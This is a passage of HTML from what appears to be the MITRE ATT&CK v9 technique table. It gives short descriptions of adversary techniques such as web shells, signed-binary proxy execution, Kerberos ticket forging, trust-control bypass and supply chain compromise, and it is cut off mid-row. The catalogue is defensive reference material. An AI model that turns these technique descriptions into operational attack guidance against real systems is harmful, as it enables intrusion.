<a href="/versions/v9/techniques/T1505/002"> Transport Agent </a> </td> <td> Adversaries may abuse Microsoft transport agents to establish persistent access to systems. Microsoft Exchange transport agents can operate on email messages passing through the transport pipeline to perform various tasks such as filtering spam, filtering malicious attachments, journaling, or adding a corporate signature to the end of all outgoing emails. Transport agents can be written by application developers and then compiled to .NET assemblies that are subsequently registered with the Exchange server. Transport agents will be invoked during a specified stage of email processing and carry out developer defined tasks. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1505/003"> .003 </a> </td> <td> <a href="/versions/v9/techniques/T1505/003"> Web Shell </a> </td> <td> Adversaries may backdoor web servers with web shells to establish persistent access to systems. A Web shell is a Web script that is placed on an openly accessible Web server to allow an adversary to use the Web server as a gateway into a network. A Web shell may provide a set of functions to execute or a command-line interface on the system that hosts the Web server. </td> </tr> <tr class="technique"> <td colspan="2"> <a href="/versions/v9/techniques/T1489"> T1489 </a> </td> <td> <a href="/versions/v9/techniques/T1489"> Service Stop </a> </td> <td> Adversaries may stop or disable services on a system to render those services unavailable to legitimate users. Stopping critical services or processes can inhibit or stop response to an incident or aid in the adversary's overall objectives to cause damage to the environment. </td> </tr> <tr class="technique"> <td colspan="2"> <a href="/versions/v9/techniques/T1129"> T1129 </a> </td> <td> <a href="/versions/v9/techniques/T1129"> Shared Modules </a> </td> <td> Adversaries may abuse shared modules to execute malicious payloads. The Windows module loader can be instructed to load DLLs from arbitrary local paths and arbitrary Universal Naming Convention (UNC) network paths. This functionality resides in NTDLL.dll and is part of the Windows <a href="/versions/v9/techniques/T1106">Native API</a> which is called from functions like <code>CreateProcess</code>, <code>LoadLibrary</code>, etc. of the Win32 API. </td> </tr> <tr class="technique"> <td colspan="2"> <a href="/versions/v9/techniques/T1218"> T1218 </a> </td> <td> <a href="/versions/v9/techniques/T1218"> Signed Binary Proxy Execution </a> </td> <td> Adversaries may bypass process and/or signature-based defenses by proxying execution of malicious content with signed binaries. Binaries signed with trusted digital certificates can execute on Windows systems protected by digital signature validation. Several Microsoft signed binaries that are default on Windows installations can be used to proxy execution of other files. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1218/001"> .001 </a> </td> <td> <a href="/versions/v9/techniques/T1218/001"> Compiled HTML File </a> </td> <td> Adversaries may abuse Compiled HTML files (.chm) to conceal malicious code. CHM files are commonly distributed as part of the Microsoft HTML Help system. CHM files are compressed compilations of various content such as HTML documents, images, and scripting/web related programming languages such VBA, JScript, Java, and ActiveX. CHM content is displayed using underlying components of the Internet Explorer browser loaded by the HTML Help executable program (hh.exe). </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1218/002"> .002 </a> </td> <td> <a href="/versions/v9/techniques/T1218/002"> Control Panel </a> </td> <td> Adversaries may abuse control.exe to proxy execution of malicious payloads. The Windows Control Panel process binary (control.exe) handles execution of Control Panel items, which are utilities that allow users to view and adjust computer settings. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1218/003"> .003 </a> </td> <td> <a href="/versions/v9/techniques/T1218/003"> CMSTP </a> </td> <td> Adversaries may abuse CMSTP to proxy execution of malicious code. The Microsoft Connection Manager Profile Installer (CMSTP.exe) is a command-line program used to install Connection Manager service profiles. CMSTP.exe accepts an installation information file (INF) as a parameter and installs a service profile leveraged for remote access connections. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1218/004"> .004 </a> </td> <td> <a href="/versions/v9/techniques/T1218/004"> InstallUtil </a> </td> <td> Adversaries may use InstallUtil to proxy execution of code through a trusted Windows utility. InstallUtil is a command-line utility that allows for installation and uninstallation of resources by executing specific installer components specified in .NET binaries. InstallUtil is digitally signed by Microsoft and located in the .NET directories on a Windows system: <code>C:\Windows\Microsoft.NET\Framework\v<version>\InstallUtil.exe</code> and <code>C:\Windows\Microsoft.NET\Framework64\v<version>\InstallUtil.exe</code>. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1218/005"> .005 </a> </td> <td> <a href="/versions/v9/techniques/T1218/005"> Mshta </a> </td> <td> Adversaries may abuse mshta.exe to proxy execution of malicious .hta files and Javascript or VBScript through a trusted Windows utility. There are several examples of different types of threats leveraging mshta.exe during initial compromise and for execution of code </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1218/007"> .007 </a> </td> <td> <a href="/versions/v9/techniques/T1218/007"> Msiexec </a> </td> <td> Adversaries may abuse msiexec.exe to proxy execution of malicious payloads. Msiexec.exe is the command-line utility for the Windows Installer and is thus commonly associated with executing installation packages (.msi). Msiexec.exe is digitally signed by Microsoft. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1218/008"> .008 </a> </td> <td> <a href="/versions/v9/techniques/T1218/008"> Odbcconf </a> </td> <td> Adversaries may abuse odbcconf.exe to proxy execution of malicious payloads. Odbcconf.exe is a Windows utility that allows you to configure Open Database Connectivity (ODBC) drivers and data source names. Odbcconf.exe is digitally signed by Microsoft. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1218/009"> .009 </a> </td> <td> <a href="/versions/v9/techniques/T1218/009"> Regsvcs/Regasm </a> </td> <td> Adversaries may abuse Regsvcs and Regasm to proxy execution of code through a trusted Windows utility. Regsvcs and Regasm are Windows command-line utilities that are used to register .NET <a href="/versions/v9/techniques/T1559/001">Component Object Model</a> (COM) assemblies. Both are digitally signed by Microsoft. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1218/010"> .010 </a> </td> <td> <a href="/versions/v9/techniques/T1218/010"> Regsvr32 </a> </td> <td> Adversaries may abuse Regsvr32.exe to proxy execution of malicious code. Regsvr32.exe is a command-line program used to register and unregister object linking and embedding controls, including dynamic link libraries (DLLs), on Windows systems. Regsvr32.exe is also a Microsoft signed binary. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1218/011"> .011 </a> </td> <td> <a href="/versions/v9/techniques/T1218/011"> Rundll32 </a> </td> <td> Adversaries may abuse rundll32.exe to proxy execution of malicious code. Using rundll32.exe, vice executing directly (i.e. <a href="/versions/v9/techniques/T1129">Shared Modules</a>), may avoid triggering security tools that may not monitor execution of the rundll32.exe process because of allowlists or false positives from normal operations. Rundll32.exe is commonly associated with executing DLL payloads. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1218/012"> .012 </a> </td> <td> <a href="/versions/v9/techniques/T1218/012"> Verclsid </a> </td> <td> Adversaries may abuse verclsid.exe to proxy execution of malicious code. Verclsid.exe is known as the Extension CLSID Verification Host and is responsible for verifying each shell extension before they are used by Windows Explorer or the Windows Shell. </td> </tr> <tr class="technique"> <td colspan="2"> <a href="/versions/v9/techniques/T1216"> T1216 </a> </td> <td> <a href="/versions/v9/techniques/T1216"> Signed Script Proxy Execution </a> </td> <td> Adversaries may use scripts signed with trusted certificates to proxy execution of malicious files. Several Microsoft signed scripts that are default on Windows installations can be used to proxy execution of other files. This behavior may be abused by adversaries to execute malicious files that could bypass application control and signature validation on systems. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1216/001"> .001 </a> </td> <td> <a href="/versions/v9/techniques/T1216/001"> PubPrn </a> </td> <td> Adversaries may use the trusted PubPrn script to proxy execution of malicious files. This behavior may bypass signature validation restrictions and application control solutions that do not account for use of these scripts. </td> </tr> <tr class="technique"> <td colspan="2"> <a href="/versions/v9/techniques/T1072"> T1072 </a> </td> <td> <a href="/versions/v9/techniques/T1072"> Software Deployment Tools </a> </td> <td> Adversaries may gain access to and use third-party software suites installed within an enterprise network, such as administration, monitoring, and deployment systems, to move laterally through the network. Third-party applications and software deployment systems may be in use in the network environment for administration purposes (e.g., SCCM, HBSS, Altiris, etc.). </td> </tr> <tr class="technique"> <td colspan="2"> <a href="/versions/v9/techniques/T1518"> T1518 </a> </td> <td> <a href="/versions/v9/techniques/T1518"> Software Discovery </a> </td> <td> Adversaries may attempt to get a listing of software and software versions that are installed on a system or in a cloud environment. Adversaries may use the information from <a href="/versions/v9/techniques/T1518">Software Discovery</a> during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1518/001"> .001 </a> </td> <td> <a href="/versions/v9/techniques/T1518/001"> Security Software Discovery </a> </td> <td> Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from <a href="/versions/v9/techniques/T1518/001">Security Software Discovery</a> during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions. </td> </tr> <tr class="technique"> <td colspan="2"> <a href="/versions/v9/techniques/T1608"> T1608 </a> </td> <td> <a href="/versions/v9/techniques/T1608"> Stage Capabilities </a> </td> <td> Adversaries may upload, install, or otherwise set up capabilities that can be used during targeting. To support their operations, an adversary may need to take capabilities they developed (<a href="/versions/v9/techniques/T1587">Develop Capabilities</a>) or obtained (<a href="/versions/v9/techniques/T1588">Obtain Capabilities</a>) and stage them on infrastructure under their control. These capabilities may be staged on infrastructure that was previously purchased/rented by the adversary (<a href="/versions/v9/techniques/T1583">Acquire Infrastructure</a>) or was otherwise compromised by them (<a href="/versions/v9/techniques/T1584">Compromise Infrastructure</a>). Capabilities can also be staged on web services, such as GitHub or Pastebin. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1608/001"> .001 </a> </td> <td> <a href="/versions/v9/techniques/T1608/001"> Upload Malware </a> </td> <td> Adversaries may upload malware to third-party or adversary controlled infrastructure to make it accessible during targeting. Malicious software can include payloads, droppers, post-compromise tools, backdoors, and a variety of other malicious content. Adversaries may upload malware to support their operations, such as making a payload available to a victim network to enable <a href="/versions/v9/techniques/T1105">Ingress Tool Transfer</a> by placing it on an Internet accessible web server. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1608/002"> .002 </a> </td> <td> <a href="/versions/v9/techniques/T1608/002"> Upload Tool </a> </td> <td> Adversaries may upload tools to third-party or adversary controlled infrastructure to make it accessible during targeting. Tools can be open or closed source, free or commercial. Tools can be used for malicious purposes by an adversary, but (unlike malware) were not intended to be used for those purposes (ex: <a href="/versions/v9/software/S0029">PsExec</a>). Adversaries may upload tools to support their operations, such as making a tool available to a victim network to enable <a href="/versions/v9/techniques/T1105">Ingress Tool Transfer</a> by placing it on an Internet accessible web server. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1608/003"> .003 </a> </td> <td> <a href="/versions/v9/techniques/T1608/003"> Install Digital Certificate </a> </td> <td> Adversaries may install SSL/TLS certificates that can be used during targeting. SSL/TLS certificates are files that can be installed on servers to enable secure communications between systems. Digital certificates include information about the key, information about its owner's identity, and the digital signature of an entity that has verified the certificate's contents are correct. If the signature is valid, and the person examining the certificate trusts the signer, then they know they can use that key to communicate securely with its owner. Certificates can be uploaded to a server, then the server can be configured to use the certificate to enable encrypted communication with it. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1608/004"> .004 </a> </td> <td> <a href="/versions/v9/techniques/T1608/004"> Drive-by Target </a> </td> <td> Adversaries may prepare an operational environment to infect systems that visit a website over the normal course of browsing. Endpoint systems may be compromised through browsing to adversary controlled sites, as in <a href="/versions/v9/techniques/T1189">Drive-by Compromise</a>. In such cases, the user's web browser is typically targeted for exploitation (often not requiring any extra user interaction once landing on the site), but adversaries may also set up websites for non-exploitation behavior such as <a href="/versions/v9/techniques/T1550/001">Application Access Token</a>. Prior to <a href="/versions/v9/techniques/T1189">Drive-by Compromise</a>, adversaries must stage resources needed to deliver that exploit to users who browse to an adversary controlled site. Drive-by content can be staged on adversary controlled infrastructure that has been acquired (<a href="/versions/v9/techniques/T1583">Acquire Infrastructure</a>) or previously compromised (<a href="/versions/v9/techniques/T1584">Compromise Infrastructure</a>). </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1608/005"> .005 </a> </td> <td> <a href="/versions/v9/techniques/T1608/005"> Link Target </a> </td> <td> Adversaries may put in place resources that are referenced by a link that can be used during targeting. An adversary may rely upon a user clicking a malicious link in order to divulge information (including credentials) or to gain execution, as in <a href="/versions/v9/techniques/T1204/001">Malicious Link</a>. Links can be used for spearphishing, such as sending an email accompanied by social engineering text to coax the user to actively click or copy and paste a URL into a browser. Prior to a phish for information (as in <a href="/versions/v9/techniques/T1598/003">Spearphishing Link</a>) or a phish to gain initial access to a system (as in <a href="/versions/v9/techniques/T1566/002">Spearphishing Link</a>), an adversary must set up the resources for a link target for the spearphishing link. </td> </tr> <tr class="technique"> <td colspan="2"> <a href="/versions/v9/techniques/T1528"> T1528 </a> </td> <td> <a href="/versions/v9/techniques/T1528"> Steal Application Access Token </a> </td> <td> Adversaries can steal user application access tokens as a means of acquiring credentials to access remote systems and resources. This can occur through social engineering and typically requires user action to grant access. </td> </tr> <tr class="technique"> <td colspan="2"> <a href="/versions/v9/techniques/T1558"> T1558 </a> </td> <td> <a href="/versions/v9/techniques/T1558"> Steal or Forge Kerberos Tickets </a> </td> <td> Adversaries may attempt to subvert Kerberos authentication by stealing or forging Kerberos tickets to enable <a href="/versions/v9/techniques/T1550/003">Pass the Ticket</a>. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1558/001"> .001 </a> </td> <td> <a href="/versions/v9/techniques/T1558/001"> Golden Ticket </a> </td> <td> Adversaries who have the KRBTGT account password hash may forge Kerberos ticket-granting tickets (TGT), also known as a golden ticket. Golden tickets enable adversaries to generate authentication material for any account in Active Directory. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1558/002"> .002 </a> </td> <td> <a href="/versions/v9/techniques/T1558/002"> Silver Ticket </a> </td> <td> Adversaries who have the password hash of a target service account (e.g. SharePoint, MSSQL) may forge Kerberos ticket granting service (TGS) tickets, also known as silver tickets. Kerberos TGS tickets are also known as service tickets. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1558/003"> .003 </a> </td> <td> <a href="/versions/v9/techniques/T1558/003"> Kerberoasting </a> </td> <td> Adversaries may abuse a valid Kerberos ticket-granting ticket (TGT) or sniff network traffic to obtain a ticket-granting service (TGS) ticket that may be vulnerable to <a href="/versions/v9/techniques/T1110">Brute Force</a>. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1558/004"> .004 </a> </td> <td> <a href="/versions/v9/techniques/T1558/004"> AS-REP Roasting </a> </td> <td> Adversaries may reveal credentials of accounts that have disabled Kerberos preauthentication by <a href="/versions/v9/techniques/T1110/002">Password Cracking</a> Kerberos messages. </td> </tr> <tr class="technique"> <td colspan="2"> <a href="/versions/v9/techniques/T1539"> T1539 </a> </td> <td> <a href="/versions/v9/techniques/T1539"> Steal Web Session Cookie </a> </td> <td> An adversary may steal web application or service session cookies and use them to gain access to web applications or Internet services as an authenticated user without needing credentials. Web applications and services often use session cookies as an authentication token after a user has authenticated to a website. </td> </tr> <tr class="technique"> <td colspan="2"> <a href="/versions/v9/techniques/T1553"> T1553 </a> </td> <td> <a href="/versions/v9/techniques/T1553"> Subvert Trust Controls </a> </td> <td> Adversaries may undermine security controls that will either warn users of untrusted activity or prevent execution of untrusted programs. Operating systems and security products may contain mechanisms to identify programs or websites as possessing some level of trust. Examples of such features would include a program being allowed to run because it is signed by a valid code signing certificate, a program prompting the user with a warning because it has an attribute set from being downloaded from the Internet, or getting an indication that you are about to connect to an untrusted site. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1553/001"> .001 </a> </td> <td> <a href="/versions/v9/techniques/T1553/001"> Gatekeeper Bypass </a> </td> <td> Adversaries may modify file attributes that signify programs are from untrusted sources to subvert Gatekeeper controls. In macOS and OS X, when applications or programs are downloaded from the internet, there is a special attribute set on the file called <code>com.apple.quarantine</code>. This attribute is read by Apple's Gatekeeper defense program at execution time and provides a prompt to the user to allow or deny execution. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1553/002"> .002 </a> </td> <td> <a href="/versions/v9/techniques/T1553/002"> Code Signing </a> </td> <td> Adversaries may create, acquire, or steal code signing materials to sign their malware or tools. Code signing provides a level of authenticity on a binary from the developer and a guarantee that the binary has not been tampered with. The certificates used during an operation may be created, acquired, or stolen by the adversary. Unlike <a href="/versions/v9/techniques/T1036/001">Invalid Code Signature</a>, this activity will result in a valid signature. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1553/003"> .003 </a> </td> <td> <a href="/versions/v9/techniques/T1553/003"> SIP and Trust Provider Hijacking </a> </td> <td> Adversaries may tamper with SIP and trust provider components to mislead the operating system and application control tools when conducting signature validation checks. In user mode, Windows Authenticode digital signatures are used to verify a file's origin and integrity, variables that may be used to establish trust in signed code (ex: a driver with a valid Microsoft signature may be handled as safe). The signature validation process is handled via the WinVerifyTrust application programming interface (API) function, which accepts an inquiry and coordinates with the appropriate trust provider, which is responsible for validating parameters of a signature. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1553/004"> .004 </a> </td> <td> <a href="/versions/v9/techniques/T1553/004"> Install Root Certificate </a> </td> <td> Adversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers. Root certificates are used in public key cryptography to identify a root certificate authority (CA). When a root certificate is installed, the system or application will trust certificates in the root's chain of trust that have been signed by the root certificate. Certificates are commonly used for establishing secure TLS/SSL communications within a web browser. When a user attempts to browse a website that presents a certificate that is not trusted an error message will be displayed to warn the user of the security risk. Depending on the security settings, the browser may not allow the user to establish a connection to the website. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1553/005"> .005 </a> </td> <td> <a href="/versions/v9/techniques/T1553/005"> Mark-of-the-Web Bypass </a> </td> <td> Adversaries may abuse specific file formats to subvert Mark-of-the-Web (MOTW) controls. In Windows, when files are downloaded from the Internet, they are tagged with a hidden NTFS Alternate Data Stream (ADS) named <code>Zone.Identifier</code> with a specific value known as the MOTW. Files that are tagged with MOTW are protected and cannot perform certain actions. For example, starting in MS Office 10, if a MS Office file has the MOTW, it will open in Protected View. Executables tagged with the MOTW will be processed by Windows Defender SmartScreen that compares files with an allowlist of well-known executables. If the file in not known/trusted, SmartScreen will prevent the execution and warn the user not to run it. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1553/006"> .006 </a> </td> <td> <a href="/versions/v9/techniques/T1553/006"> Code Signing Policy Modification </a> </td> <td> Adversaries may modify code signing policies to enable execution of unsigned or self-signed code. Code signing provides a level of authenticity on a program from a developer and a guarantee that the program has not been tampered with. Security controls can include enforcement mechanisms to ensure that only valid, signed code can be run on an operating system. </td> </tr> <tr class="technique"> <td colspan="2"> <a href="/versions/v9/techniques/T1195"> T1195 </a> </td> <td> <a href="/versions/v9/techniques/T1195"> Supply Chain Compromise </a> </td> <td> Adversaries may manipulate products or product delivery mechanisms prior to receipt by a final consumer for the purpose of data or system compromise. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1195/001"> .001 </a> </td> <td> <a href="/versions/v9/techniques/T1195/001"> Compromise Software Dependencies and Development Tools </a> </td> <td> Adversaries may manipulate software dependencies and development tools prior to receipt by a final consumer for the purpose of data or system compromise. Applications often depend on external software to function properly. Popular open source projects that are used as dependencies in many applications may be targeted as a means to add malicious code to users of the dependency. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1195/002"> .002 </a> </td> <td> <a href="/versions/v9/techniques/T1195/002"> Compromise Software Supply Chain </a> </td> <td> Adversaries may manipulate application software prior to receipt by a final consumer for the purpose of data or system compromise. Supply chain compromise of software can take place in a number of ways, including manipulation of the application source code, manipulation of the update/distribution mechanism for that software, or replacing compiled releases with a modified version. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1195/003"> .003 </a> </td> <td> <a href="/versions/v9/techniques/T1195/003"> Compromise Hardware Supply Chain </a> </td> <td> Adversaries may manipulate hardware components in products prior to receipt by a final consumer for the purpose of data or system compromise. By modifying hardware or firmware in the supply chain, adversaries can insert a backdoor into consumer networks that may be difficult to detect and give the adversary a high degree of control over the system. Hardware backdoors may be inserted into various devices, such as servers, workstations, network infrastructure, or peripherals. </td> </tr> <tr class="technique"> <td colspan="2"> <a href="/versions/v9/techniques/T1082"> T1082 </a> </td> <td> <a href="/versions/v9/techniques/T1082"> System Information Discovery </a> </td> <td> An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from <a href="/versions/v9/techniques/T1082">System Information Discovery</a> during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions. </td> </tr> <tr class="technique"> <td colspan="2"> <a href="/versions/v9/techniques/T1614"> T1614 </a> </td> <td> <a href="/versions/v9/techniques/T1614"> System Location Discovery </a> </td> <td> Adversaries may gather information in an attempt to calculate the geographical location of a victim host. Adversaries may use the information from <a href="/versions/v9/techniques/T1614">System Location Discovery</a> during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions. </td> </tr> <tr class="technique"> <td colspan="2"> <a href="/versions/v9/techniques/T1016"> T1016 </a> </td> <td> <a href="/versions/v9/techniques/T1016"> System Network Configuration Discovery </a> </td> <td> Adversaries may look for details about the network configuration and settings of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include <a href="/versions/v9/software/S0099">Arp</a>, <a href="/versions/v9/software/S0100">ipconfig</a>/<a href="/versions/v9/software/S0101">ifconfig</a>, <a href="/versions/v9/software/S0102">nbtstat</a>, and <a href="/versions/v9/software/S0103">route</a>. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1016/001"> .001 </a> </td> <td> <a href="/versions/v9/techniques/T1016/001"> Internet Connection Discovery </a> </td> <td> Adversaries may check for Internet connectivity on compromised systems. This may be performed during automated discovery and can be accomplished in numerous ways such as using <a href="/versions/v9/software/S0097">Ping</a>, <code>tracert</code>, and GET requests to websites. </td> </tr> <tr class="technique"> <td colspan="2"> <a href="/versions/v9/techniques/T1049"> T1049 </a> </td> <td> <a href="/versions/v9/techniques/T1049"> System Network Connections Discovery </a> </td> <td> Adversaries may attempt to get a listing of network connections to or from the compromised system they are currently accessing or from remote systems by querying for information over the network. </td> </tr> <tr class="technique"> <td colspan="2"> <a href="/versions/v9/techniques/T1033"> T1033 </a> </td> <td> <a href="/versions/v9/techniques/T1033"> System Owner/User Discovery </a> </td> <td> Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using <a href="/versions/v9/techniques/T1003">OS Credential Dumping</a>. The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from <a href="/versions/v9/techniques/T1033">System Owner/User Discovery</a> during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions. </td> </tr> <tr class="technique"> <td colspan="2"> <a href="/versions/v9/techniques/T1007"> T1007 </a> </td> <td> <a href="/versions/v9/techniques/T1007"> System Service Discovery </a> </td> <td> Adversaries may try to get information about registered services. Commands that may obtain information about services using operating system utilities are "sc," "tasklist /svc" using <a href="/versions/v9/software/S0057">Tasklist</a>, and "net start" using <a href="/versions/v9/software/S0039">Net</a>, but adversaries may also use other tools as well. Adversaries may use the information from <a href="/versions/v9/techniques/T1007">System Service Discovery</a> during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions. </td> </tr> <tr class="technique"> <td colspan="2"> <a href="/versions/v9/techniques/T1569"> T1569 </a> </td> <td> <a href="/versions/v9/techniques/T1569"> System Services </a> </td> <td> Adversaries may abuse system services or daemons to execute commands or programs. Adversaries can execute malicious content by interacting with or creating services. Many services are set to run at boot, which can aid in achieving persistence (<a href="/versions/v9/techniques/T1543">Create or Modify System Process</a>), but adversaries can also abuse services for one-time or temporary execution. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1569/001"> .001 </a> </td> <td> <a href="/versions/v9/techniques/T1569/001"> Launchctl </a> </td> <td> Adversaries may abuse launchctl to execute commands or programs. Launchctl controls the macOS launchd process, which handles things like <a href="/versions/v9/techniques/T1543/001">Launch Agent</a>s and <a href="/versions/v9/techniques/T1543/004">Launch Daemon</a>s, but can execute other commands or programs itself. Launchctl supports taking subcommands on the command-line, interactively, or even redirected from standard input. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1569/002"> .002 </a> </td> <td> <a href="/versions/v9/techniques/T1569/002"> Service Execution </a> </td> <td> Adversaries may abuse the Windows service control manager to execute malicious commands or payloads. The Windows service control manager (<code>services.exe</code>) is an interface to manage and manipulate services. The service control manager is accessible to users via GUI components as well as system utilities such as <code>sc.exe</code> and <a href="/versions/v9/software/S0039">Net</a>. </td> </tr> <tr class="technique"> <td colspan="2"> <a href="/versions/v9/techniques/T1529"> T1529 </a> </td> <td> <a href="/versions/v9/techniques/T1529"> System Shutdown/Reboot </a> </td> <td> Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer. Shutting down or rebooting systems may disrupt access to computer resources for legitimate users. </td> </tr> <tr class="technique"> <td colspan="2"> <a href="/versions/v9/techniques/T1124"> T1124 </a> </td> <td> <a href="/versions/v9/techniques/T1124"> System Time Discovery </a> </td> <td> An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network. </td> </tr> <tr class="technique"> <td colspan="2"> <a href="/versions/v9/techniques/T1080"> T1080 </a> </td> <td> <a href="/versions/v9/techniques/T1080"> Taint Shared Content </a> </td> <td> Adversaries may deliver payloads to remote systems by adding content to shared storage locations, such as network drives or internal code repositories. Content stored on network drives or in other shared locations may be tainted by adding malicious programs, scripts, or exploit code to otherwise valid files. Once a user opens the shared tainted content, the malicious portion can be executed to run the adversary's code on a remote system. Adversaries may use tainted shared content to move laterally. </td> </tr> <tr class="technique"> <td colspan="2"> <a href="/versions/v9/techniques/T1221"> T1221 </a> </td> <td> <a href="/versions/v9/techniques/T1221"> Template Injection </a> </td> <td> Adversaries may create or modify references in Office document templates to conceal malicious code or force authentication attempts. Microsoft’s Office Open XML (OOXML) specification defines an XML-based format for Office documents (.docx, xlsx, .pptx) to replace older binary formats (.doc, .xls, .ppt). OOXML files are packed together ZIP archives compromised of various XML files, referred to as parts, containing properties that collectively define how a document is rendered. </td> </tr> <tr class="technique"> <td colspan="2"> <a href="/versions/v9/techniques/T1205"> T1205 </a> </td> <td> <a href="/versions/v9/techniques/T1205"> Traffic Signaling </a> </td> <td> Adversaries may use traffic signaling to hide open ports or other malicious functionality used for persistence or command and control. Traffic signaling involves the use of a magic value or sequence that must be sent to a system to trigger a special response, such as opening a closed port or executing a malicious task. This may take the form of sending a series of packets with certain characteristics before a port will be opened that the adversary can use for command and control. Usually this series of packets consists of attempted connections to a predefined sequence of closed ports (i.e. <a href="/versions/v9/techniques/T1205/001">Port Knocking</a>), but can involve unusual flags, specific strings, or other unique characteristics. After the sequence is completed, opening a port may be accomplished by the host-based firewall, but could also be implemented by custom software. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1205/001"> .001 </a> </td> <td> <a href="/versions/v9/techniques/T1205/001"> Port Knocking </a> </td> <td> Adversaries may use port knocking to hide open ports used for persistence or command and control. To enable a port, an adversary sends a series of attempted connections to a predefined sequence of closed ports. After the sequence is completed, opening a port is often accomplished by the host based firewall, but could also be implemented by custom software. </td> </tr> <tr class="technique"> <td colspan="2"> <a href="/versions/v9/techniques/T1537"> T1537 </a> </td> <td> <a href="/versions/v9/techniques/T1537"> Transfer Data to Cloud Account </a> </td> <td> Adversaries may exfiltrate data by transferring the data, including backups of cloud environments, to another cloud account they control on the same service to avoid typical file transfers/downloads and network-based exfiltration detection. </td> </tr> <tr class="technique"> <td colspan="2"> <a href="/versions/v9/techniques/T1127"> T1127 </a> </td> <td> <a href="/versions/v9/techniques/T1127"> Trusted Developer Utilities Proxy Execution </a> </td> <td> Adversaries may take advantage of trusted developer utilities to proxy execution of malicious payloads. There are many utilities used for software development related tasks that can be used to execute code in various forms to assist in development, debugging, and reverse engineering. These utilities may often be signed with legitimate certificates that allow them to execute on a system and proxy execution of malicious code through a trusted process that effectively bypasses application control solutions. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1127/001"> .001 </a> </td> <td> <a href="/versions/v9/techniques/T1127/001"> MSBuild </a> </td> <td> Adversaries may use MSBuild to proxy execution of code through a trusted Windows utility. MSBuild.exe (Microsoft Build Engine) is a software build platform used by Visual Studio. It handles XML formatted project files that define requirements for loading and building various platforms and configurations. </td> </tr> <tr class="technique"> <td colspan="2"> <a href="/versions/v9/techniques/T1199"> T1199 </a> </td> <td> <a href="/versions/v9/techniques/T1199"> Trusted Relationship </a> </td> <td> Adversaries may breach or otherwise leverage organizations who have access to intended victims. Access through trusted third party relationship exploits an existing connection that may not be protected or receives less scrutiny than standard mechanisms of gaining access to a network. </td> </tr> <tr class="technique"> <td colspan="2"> <a href="/versions/v9/techniques/T1111"> 